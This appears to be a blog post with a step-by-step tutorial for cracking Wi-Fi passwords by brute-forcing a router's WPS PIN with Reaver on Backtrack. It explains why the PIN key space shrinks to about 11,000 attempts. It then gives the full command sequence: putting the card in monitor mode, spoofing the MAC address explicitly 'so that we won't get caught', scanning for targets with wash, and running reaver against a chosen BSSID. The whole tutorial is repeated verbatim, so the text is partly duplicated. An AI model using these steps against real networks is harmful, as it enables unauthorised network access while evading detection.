Cracking wifi Password using Backtrack
WPA/WPA2 password can be cracked simply by capturing WPA handshake and
then applying a dictionary attack on them. If he passphrase is in the
dictionary then password will be cracked, and this process may take
hours, in some cases in even days. But what if password is not in
dictionary?
So here we will learn to crack these passpharses
WPS:- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless
home network. By default this is enabled in most of routers.
Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers
are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which
can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in
11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of
digits, special symbols
Let's Start :
Boot your Backtrack :
Let's we will change the mac address of our network card so that we won't get caught
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Now run the following the command to get all the available AP's
wash -1 mon0
Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:
reaver -i mon0 -b <bssid> -vv
Now wait until you Reaver brute force's the pin. Once its done, you'll have
WPS Pin
WPA PSK
AP SSID
So here we will learn to crack these passpharses
WPS:- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless
home network. By default this is enabled in most of routers.
Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers
are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which
can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.
The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in
11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of
digits, special symbols
Let's Start :
Boot your Backtrack :
Let's we will change the mac address of our network card so that we won't get caught
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Now run the following the command to get all the available AP's
wash -1 mon0
Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:
reaver -i mon0 -b <bssid> -vv
Now wait until you Reaver brute force's the pin. Once its done, you'll have
WPS Pin
WPA PSK
AP SSID
0 comments: